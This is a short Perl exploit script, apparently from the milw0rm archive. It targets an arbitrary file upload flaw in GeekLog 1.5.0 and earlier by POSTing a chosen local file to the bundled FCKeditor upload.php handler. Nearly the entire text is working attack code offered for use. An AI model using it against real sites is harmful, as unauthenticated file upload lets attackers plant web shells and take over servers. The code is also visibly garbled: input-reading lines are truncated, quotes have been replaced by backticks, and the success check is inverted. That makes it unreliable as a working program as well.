GeekLog <= 1.5.0 Remote Arbitrary File Upload Exploit#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <); print `Enter File Path(path to local file to upload): `; chomp(my $file=); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php', Content_Type => 'form-data', Content => [ NewFile => $file ] ); if($re->is_success) { if( index($re->content, `Disabled`) != -1 ) { print `Exploit Successfull! File Uploaded!\n`; } else { print `File Upload Is Disabled! Failed!\n`; } } else { print `HTTP Request Failed!\n`; } exit; # milw0rm.com [2008-08-25]